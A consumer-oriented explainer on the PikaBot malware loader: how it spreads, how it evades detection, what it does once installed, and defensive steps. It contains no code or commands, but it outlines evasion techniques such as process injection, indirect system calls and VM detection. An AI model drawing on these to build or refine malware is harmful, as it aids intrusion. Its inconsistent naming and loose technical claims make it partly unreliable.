PikaBot can infect a system remotely using its modular structure, which remains hidden inside its system. The core module remains encrypted to avoid detection. It connects to a remote server called a command-and-control (C2) server. The C2 server sends instructions to the module, and the malware works according to these commands. PikaBot uses a “code injection technique” to infect a device and inject the malware into a legitimate program or process. In this process, PikaBot decrypts the core module first and then injects it into a legitimate program that makes it look like a part of the legitimate program or a process of the PC.
PikaBot came into light in early 2023 as a substitute or to fill the gap of other malicious programs such as QakBot and DarkGate. It uses the same techniques as QakBot and DarkGate to spread and infiltrate a system, including phishing emails, compromised online sites, and unsafe attachments. It depicts the same communication behavior with the C2 server to facilitate malicious activities inside the system. PikaBot is a risk for cybersecurity in today’s digital age.
What Methods PickaBot Use to Distribute on Your PC?
PickaBot uses email spam campaigns, malicious links, and zip files to infect and access a device. It follows the same methods to infect a PC as the QakBot and Darkgate use to infiltrate and inject the computer with malicious programs. Here are the methods PickaBot use to infect and access a device:
Email Spam Campaigns
In this method, cybercriminals send spam emails in bulk to the potential victims. When you see them from outward, these emails look legitimate and come from trusted sources. But in reality, they are baits that trick a user into opening and taking action as per the content. These emails are invoices, business communications, or notifications created as per the victim’s location. The content, language, and formatting meet people’s expectations in specific geographical areas. When a user interacts with these emails, he cannot remain without taking action conforming to the email content. As a result, malware downloads on the device, and the user ends up compromising his device.
SMB Networks and Links
Cybercriminals exploit SMBs to distribute deadly malware on different devices. Server Message Block (SMB) shares are network protocols for sharing files and computer communication that allow devices to access shared files on a local network. It provides a process of controlling and authenticating the shared resources on the local network. Users can use it to read and write files and request services from server programs on the same network. Cybercriminals place malware files and links on a computer. When this device connects to an SMB share, the malware spreads to all other devices. Once the module core in the PickaBot is active in a system, the rest of the virus activities follow in the background.
Malicious Zip Files
Zip files are another method cybercriminals use to infect your device with the PickaBot. They send you links to download zipped files that seem genuine and harmless. But, when you click them and download the zipped file, you download malware files on your PC. The zipped file contains loader files in them. Loaders initiate the process of infecting the device with the main malware. The loader activates the core module on the PC, and all the malicious activities follow in the subsequent stages.
Attackers make Zip files available on SMB share networks from where these files enter every device that is connected to the shared network. They also use spam campaigns to provide a link to the SMB share. The user gets an SMB share link of a zip file in the spam emails. The malware becomes active when he clicks and downloads a zip file and opens the executable on his system. After this, the loader malware downloads and activates the core module part of the PickaBot. With this, all the malicious activities start rampaging the whole device.
Different Attack Vectors
PickaBot uses different attack vectors to infect and get the most out of a system. It employs multiple file formats to bypass security measures. Each file type uses a different method to deliver the malware. Cybercriminals use fitting techniques for all kinds of users to trick them into initiating the PC infection process. For example, a tampered Word document can start the virus infection process in the system, and an executable can run a loader malware directly on the PC.
Based on this, if a user is more prone to open Word documents, then cyberpunks will send them malicious documents. If the user works with the executable files, then attackers will send them the same malicious files. So, black hats use various vectors to inject malware into a PC. As a result, PickaBot uses executable files, office documents, PDF files, and compressed documents to launch its malicious operations.
HTML and JavaScript in Attachments
Attackers use HTML and JavaScript to launch and execute malware programs. They hide JavaScript in HTML files and vice versa to hide malware payloads and redirect users to compromised sites. This method allows them to avoid email security filters and other authorization processes.
Moniker Link Bug
PickaBot exploits the MonikerLink feature to place malicious links in the reference that directs the user to a remote SMB share injected with the malware. When the user clicks a Moniker Link referencing an SMB share, it automatically opens the remote source fitted with the virus. From there, the malware enters the device when the user clicks the download link. Cybercriminals can easily inject a device with the PickaBot malware program by exploiting the moniker link feature. It also provides them with the advantage of bypassing security measures. The Moniker Link does not include a traditional file attachment or link to a known malicious domain. Due to this, the conventional email filtering system fails to detect the virus in the reference link.
What Techniques PickaBot Use to Avoid Detection?
PikaBot uses highly advanced tactics to avoid detection and run its malicious operations of data theft, spying, online tracking, and running ransomware gangs. Here are some points that elaborate on how it runs its malicious operations:
Encrypted Communication Channels
PickaBot uses secure communication channels with command and control (C2). Due to this, all the data it sends and receives remains encrypted. Encryption hides the nature of transmitted data. As a result of this, it becomes quite difficult for security tools to identify and prevent the malicious program from infiltrating your PC.
Non-Standard Port
To avoid detection from security software and other monitoring tools, PickaBot uses non-standard ports. Security software always focuses on standard ports, such as HTTP on port 80 or HTTPS on port 443. When a non-standard port comes across, it fails to detect the online threat. Non-standard ports easily bypass the protection measures establishing communication with the C2 server.
Virtualization Evasion
PickaBot detects virtual machines (VMs) to know the conditions and environments in which it operate. It may include the signs of virtualization, such as the hardware configurations, system files related to the VMs, processes, and sandboxing that a security software uses to identify the nature of the software. If it detects any such sign, PickaBot disables its functionality to prevent security software analysis and learn more about the malware. In this way, it becomes far more difficult for the security teams to study and create a solution for the malware.
Process Injection
PickaBot uses a process injection technique to infect a device with its malicious code within the memory space of legitimate system processes. When it injects the virus codes into legitimate programs, the virus activity runs parallel to that of the original program and, at the same time, remains hidden. In this situation, detecting the real culprit becomes quite challenging for the defence mechanism of a system.
Persistence Mechanisms
PickaBot uses various methods such as scheduled tasks, startup functionality in the PC to launch the programs automatically, and modifying registry keys. In the registry key, the malware adds entries to start automatically whenever the system boots. It stores configuration data in the registry, such as C2 server addresses and infection markers. It can also disable the protection features in the system and firewall to avoid detection. A Pickabot can easily maintain its persistence mechanism and existence on a device using these techniques.
Collect Data About Infected PC
PickaBot analyzes the device and collects detailed information into which it is injected. It learns about the version of the operating system, network settings, running processes, and the active defence mechanism in the device. With the help of this survey, black hats learn about the conditions and use the most effective method to carry out their malicious operations. Attackers share this information with the ransomware operators to help them tackle the situation accordingly. Using this information, the attackers pinpoint the high-value targets and data. After this, they launch their malicious operations to encrypt the files and block the user from accessing the system.
Suspended Injection Process
It first suspends the program and then injects the virus code into the memory of the space. In this technique, the malware avoids triggering alerts for behaviour analysis tools that monitor the system around the clock. After the injection is complete, the suspended process resumes its activity. In this situation, the behaviour-based scanning tool fails to detect the malware and suspicious activities in the system.
Indirect System Calls
Programs make system calls to request services from the operating system. Indirect system calls are requests made that are not directly associated with the needed services. So, PikaBot uses indirect system calls to hide the true nature of its actions. Due to this, the antimalware system on the device finds it difficult to detect malware and its malicious activities. Since the system call pattern does not match the known signatures of the virus, the malware remains undetected.
Dynamic Decryption of Strings
Pickabot uses dynamic decryption of strings to inject its virus codes into a network and system. In this process, critical strings such as URLs, function names, or encryption keys are not stored in plaintext. This string remains encrypted, and the malware decrypts these strings at the time of launch. Due to this, the static analysis tool cannot analyze the information quickly. The strings remain coded, and the true nature of activity becomes obscure for the defence mechanism.
Developing New Versions
To avoid detection, Pickabot keeps developing new versions of the virus codes. Since its launch in 2023, it has become more advanced and has improved its functionality and sidelining techniques. The Feb 2024 latest version introduced new anti-analysis capabilities. Also, the command and control (C2) made many changes to beat and bypass the latest antimalware software.
What Harmful Activities PickaBot Perform?
PickaBot is a highly sophisticated malware that poses various security risks for digital devices, networks, and privacy. It is capable of a wide range of harmful activities that pose a serious user risk. Here are some security risks PickaBot poses for internet users:
Payload Delivery
It can download and run additional payloads that include different types of malware and viruses. It can distribute malicious programs such as ransomware, spyware, keyloggers, crypto-miners, and post-exploitation tools like cobalt strike and Meterpreter to enter a system at a deeper level.
Gathering System Information
It is capable of gathering system information, including Operating system versions, Hardware specifications, Running processes, Network configurations, and more, to launch successful attacks.
Credential Theft
Once it is inside your PC, it can easily steal your critical data, user IDs, browser-stored passwords, and other confidential information from the system.
Targeted Attacks
Using its modular design and collected data, it can easily customize virus attacks on a device. According to the device’s condition, it can deploy a fitting ransomware or spyware to infect the system and promote malicious activities.
Privilege Escalation
Privilege escalation exploits system vulnerabilities to deploy a virus code on the PC. Moreover, it can manipulate the internal processes to give black hats more control over the device. Using this, they can easily access the sensitive areas that allow bad actors to do their work hassle-free.
Network Propagation
It can infect the networks with deadly virus codes in order to move the malware to all the devices that are connected to the same network. It exploits SMB shares (file shares) within a specific network to propagate malware at the organizational level.
Crypto-Mining
A PickaBot can use the processing power of a device to mine different types of cryptocurrencies. It runs the mining program in the background and validates the transactions. The mining process slows down the system process, consumes all the resources, and renders the device stagnant and incompetent for normal tasks.
Installing Spyware & Ransomware
PickaBot can download and run spyware and ransomware on a device to track all the online activities and encrypt the whole system. Spyware collects all the data, including keystrokes, screen captures, and browsing history. Ransomware encrypts all the system files, access, and data, creating all sorts of difficulties for the user.
Run Arbitrary Commands
PickaBot is capable of running arbitrary commands on the system. Using these commands, it can modify files, disable security features, and install more viruses. Once it is successful, it delivers malicious programs to the device, including trojans, browser hijackers, rootkits, keyloggers, and more.
Botnet Participation
It can add the system to a botnet, which is a network of virus-infected devices. Black hats control these devices and use them for purposes like Distributed Denial of Service (DDoS) attacks and spam email sending.
How to Get Rid of PikaBot Virus?
Disable Risky Files
You must disable risky files that streamline the malware to start the infection in the first place. These files include .hta (HTML application files). xll (Excel add-ins), .js (JavaScript files), .wsf (Windows Script Files), and .msi (Microsoft Installer files). Attackers use these files to run phishing campaigns and target their victims. When you disable these files from running PickaBot, you won’t be able to use these files to initiate the infection process.
Behavioral Detection
Use a behavior detection tool to monitor and identify suspicious system activities. This tool detects the misuse of living-off-the-land binaries (LOLBins), PowerShell, cmd.exe, mshta.exe, etc. If pickaBot does anything with these binaries to do any malicious activity, behavioral detection will catch it and flag the malware.
Use EDR solutions
Implementing an EDR solution to monitor Endpoint activities is one of the best options for dealing with malware like Pickabot. It monitors the endpoint in real-time, identifies suspicious activities, and automatically blocks or sandboxes the virus. It can effectively catch process injection, dangerous file executions, and links to unsafe domains.
Avoid Phishing and Spam Emails
It is highly important to avoid phishing and spam emails to protect your devices from loaders and module viruses. Spam and phishing email campaigns are the most used methods cybercriminals use to infect your device with the PickaBot. You should use smart email filtering solutions and content analysis tools to detect and block threats and malicious attachments.
Network Security and Access Restrictions
Network security is one of the most important things in preventing malware infections. You should limit access to SMB resources and monitor network traffic to secure your device. Along with this, you should also use threat intelligence, antivirus software, and network firewalls to control and monitor your device’s online traffic. It is highly important to separate critical systems and sensitive data from other network areas. This separation stops the spread of malicious programs.
Regular Updates and Patching
It is highly important to keep your operating system, apps and accounts up to date to prevent viruses from exploiting the vulnerabilities and infecting your PC. Regular updates provide regular patching of the security vents and program vulnerabilities that develop over time. Hence, make sure to download the new updates as soon as they are made available. New updates also offer upgrades and functionalities conducive to a smooth user experience.
Disable Macros in Office Documents
Macros are scripts embedded in office documents, such as MS Office files like Word, Excel, or PowerPoint. Macros are one of the most common methods cybercriminals use to inject malicious code into a system. Black hats use programming languages like Visual Basic for Applications (VBA) or JavaScript to write these scripts in an office document. Hence, it is highly important to disable macros in the office documents to prevent malware infection on your device.
Take Backup Regularly
You should take a backup of all your important files and data to minimize the ransomware effect. In case of a ransomware attack you will be able to recover your data and keep working on your system without any risks.
